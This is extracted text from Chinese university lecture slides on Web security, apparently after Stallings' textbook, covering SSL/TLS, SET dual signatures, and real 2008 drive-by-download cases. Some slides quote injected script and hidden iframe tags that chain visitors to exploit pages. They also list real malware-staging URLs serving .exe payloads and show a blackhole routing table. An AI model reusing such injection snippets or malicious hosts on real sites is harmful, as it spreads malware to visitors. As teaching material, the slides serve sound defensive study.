17 Web Fourth Edition by William Stallings Slides
现代密码学理论与实践 第 17章 Web的安全 Fourth Edition by William Stallings Slides by 杨寿保 syang@ustc. edu. cn http: //staff. ustc. edu. cn/~syang 2012年 11月 2021/3/5 现代密码学理论与实践-17:Web的安全 1/49
SSL Record Format 2021/3/5 现代密码学理论与实践-17:Web的安全 9
17. 2. 7 传输层安全TLS l l TLS具有和SSL一样的记录格式,由RFC 2246定义 和SSLv 3很类似,不同之处在于: l l l l l 2021/3/5 version number message authentication code pseudorandom function alert codes cipher suites client certificate types certificate_verify and finished message cryptographic computations padding 现代密码学理论与实践-17:Web的安全 17
SET Participants 2021/3/5 现代密码学理论与实践-17:Web的安全 21
![17. 3. 3 Dual Signature双向签名 l 2021/3/5 DS=EKRC[H(H(PI)||H(OI))] 现代密码学理论与实践-17:Web的安全 23](http://slidetodoc.com/presentation_image_h/24c9f0d830cb5dde4137d71727485e5d/image-23.jpg "17. 3. 3 Dual Signature双向签名 l 2021/3/5 DS=EKRC[H(H(PI)||H(OI))] 现代密码学理论与实践-17:Web的安全 23")
17. 3. 3 Dual Signature双向签名 l 2021/3/5 DS=EKRC[H(H(PI)||H(OI))] 现代密码学理论与实践-17:Web的安全 23
17. 3. 4 Payment Processing支付处理 2021/3/5 现代密码学理论与实践-17:Web的安全 25
一个“挂马”例子 l 深圳职业技术学院汽车与交通学院 http: //autocar. szpt. edu. cn/Read. News. asp? News. ID=809 l 这个网页中有下面一段代码 <script src=http: //bkzs. njnu. edu. cn/1. js> l 1. js内容是 <iframe src=http: //abca 2. cn/a 0076159/a 07. htm width=100 height=0></iframe> l http: //abca 2. cn/a 0076159/a 07. htm的内容是 <iframe width=100 height=0 src=new. html></iframe> l new. html是利用几个媒体播放漏洞下载恶意软件的 代码 2021/3/5 现代密码学理论与实践-17:Web的安全 36
![一个网站被挂了多个“马” l Log is generated by Fre. Show. [wide]http: //bbs. 07073. com/ [script]http: //bbs.](http://slidetodoc.com/presentation_image_h/24c9f0d830cb5dde4137d71727485e5d/image-37.jpg "一个网站被挂了多个“马” l Log is generated by Fre. Show. [wide]http: //bbs. 07073. com/ [script]http: //bbs.")
一个网站被挂了多个“马” l Log is generated by Fre. Show. [wide]http: //bbs. 07073. com/ [script]http: //bbs. 07073. com/include/javascript/common. js [frame]http: //wangluo 7788. com/b 7. htm? a 023 [frame]http: //wangluo 7788. com/flash. htm [frame]http: //wangluo 7788. com/14. htm [frame]http: //wangluo 7788. com/office. htm [frame]http: //wangluo 7788. com/lz. htm [frame]http: //wangluo 7788. com/re 10. htm [frame]http: //wangluo 7788. com/re 11. htm [frame]http: //www. eqw 001. cn/fs/7. htm [frame]http: //max-5. cn/a 192/fxx. htm [frame]http: //max-5. cn/a 192/fx. htm [frame]http: //max-5. cn/a 192/ilink. html [frame]http: //max-5. cn/a 192/flink. html [frame]http: //max-5. cn/a 192/ss. html [frame]http: //max-5. cn/a 192/ms 06014. htm [frame]http: //max-5. cn/a 192/GLWORLD. html [frame]http: //jzm 015. cn/sina. htm [frame]http: //jzm 015. cn/UU. htm [frame]http: //max-5. cn/a 192/Thunder. html [frame]http: //max-5. cn/a 192/real. htm [frame]http: //max-5. cn/a 192/Real. html 2021/3/5 现代密码学理论与实践-17:Web的安全 37
![恶意代码中转站(1) l 感染病毒的机器会下载http: //x. us-ok. net/1234. txt 这个文件内容是 [oo] c 0=http: //1. 111991. net/0.](http://slidetodoc.com/presentation_image_h/24c9f0d830cb5dde4137d71727485e5d/image-38.jpg "恶意代码中转站(1) l 感染病毒的机器会下载http: //x. us-ok. net/1234. txt 这个文件内容是 [oo] c 0=http: //1. 111991. net/0.")
恶意代码中转站(1) l 感染病毒的机器会下载http: //x. us-ok. net/1234. txt 这个文件内容是 [oo] c 0=http: //1. 111991. net/0. exe c 1=http: //1. 111991. net/1. exe c 2=http: //1. 111991. net/2. exe c 3=http: //1. 111991. net/3. exe c 4=http: //1. 111991. net/4. exe c 5=http: //1. 111991. net/5. exe c 6=http: //1. 111991. net/6. exe c 7=http: //1. 111991. net/7. exe c 8=http: //1. 111991. net/8. exe c 9=http: //1. 111991. net/9. exe l 科大网络中心2008年 5月5日开始关注类似的访问序列 2021/3/5 现代密码学理论与实践-17:Web的安全 38
恶意代码中转站(2) http: //www. xh 2 my. cn/0808 xo. html 内容是: 2008 -09 -17 http: //www. xh 2 my. cn/mma/1. exe 2008 -09 -15 http: //www. xh 2 my. cn/mma/2. exe 2008 -09 -20 http: //www. xh 2 my. cn/mma/3. exe 2008 -09 -21 http: //www. xh 2 my. cn/mma/4. exe 2008 -09 -23 http: //www. xh 2 my. cn/mma/5. exe 2008 -09 -21 http: //www. xh 2 my. cn/mma/6. exe 2008 -09 -12 http: //www. xh 2 my. cn/mma/7. exe 2008 -09 -13 http: //www. xh 2 my. cn/mma/8. exe 2008 -08 -08 http: //www. xh 2 my. cn/mma/9. exe 2021/3/5 现代密码学理论与实践-17:Web的安全 39
![恶意代码中转站(3) http: //sql. 78 -11. net/dz. asp内容是 [update] date=20080923 [file] isfile=1 count=28 url 1=http:](http://slidetodoc.com/presentation_image_h/24c9f0d830cb5dde4137d71727485e5d/image-40.jpg "恶意代码中转站(3) http: //sql. 78 -11. net/dz. asp内容是 [update] date=20080923 [file] isfile=1 count=28 url 1=http:")
恶意代码中转站(3) http: //sql. 78 -11. net/dz. asp内容是 [update] date=20080923 [file] isfile=1 count=28 url 1=http: //sql. 78 -11. net/ma/cw 01. exe mark 1=aa url 2=http: //sql. 78 -11. net/ma/cw 02. exe mark 2=bb url 3=http: //sql. 78 -11. net/ma/cw 03. exe mark 3=cc url 4=http: //sql. 78 -11. net/ma/cw 04. exe 2021/3/5 现代密码学理论与实践-17:Web的安全 40
![恶意代码中转站(4) http: //www. jjyyzmj. cn/mm. txt内容是 [oo] c 0=http: //61. 164. 118. 208/new 1.](http://slidetodoc.com/presentation_image_h/24c9f0d830cb5dde4137d71727485e5d/image-41.jpg "恶意代码中转站(4) http: //www. jjyyzmj. cn/mm. txt内容是 [oo] c 0=http: //61. 164. 118. 208/new 1.")
恶意代码中转站(4) http: //www. jjyyzmj. cn/mm. txt内容是 [oo] c 0=http: //61. 164. 118. 208/new 1. exe c 1=http: //61. 164. 118. 208/new 2. exe c 2=http: //61. 164. 118. 208/new 3. exe c 3=http: //61. 164. 118. 208/new 4. exe c 4=http: //61. 164. 118. 208/new 5. exe c 5=http: //61. 164. 118. 208/new 6. exe c 6=http: //61. 164. 118. 208/new 7. exe 2021/3/5 现代密码学理论与实践-17:Web的安全 41
教育网主干网黑名单路由例子 hef 1 -bgw>show ip route | inc 192. 0. 2. 1 B 220. 228. 1. 69 [200/70] via 192. 0. 2. 1, 2 d 11 h B 222. 70. 222. 196 [200/70] via 192. 0. 2. 1, 2 d 11 h B 202. 103. 249. 119 [200/70] via 192. 0. 2. 1, 2 d 11 h B 192. 115. 106. 236 [200/70] via 192. 0. 2. 1, 2 d 11 h B 202. 123. 66. 136/32 [200/70] via 192. 0. 2. 1, 2 d 11 h B 137. 189. 192. 204/32 [200/70] via 192. 0. 2. 1, 2 d 11 h B 137. 189. 178. 189/32 [200/70] via 192. 0. 2. 1, 2 d 11 h B 137. 189. 161. 113/32 [200/70] via 192. 0. 2. 1, 2 d 11 h B 220. 228. 0. 132 [200/70] via 192. 0. 2. 1, 2 d 11 h B 69. 25. 212. 134/32 [200/70] via 192. 0. 2. 1, 2 d 11 h B 69. 20. 63. 83/32 [200/70] via 192. 0. 2. 1, 2 d 11 h 2021/3/5 现代密码学理论与实践-17:Web的安全 44
- Slides: 49
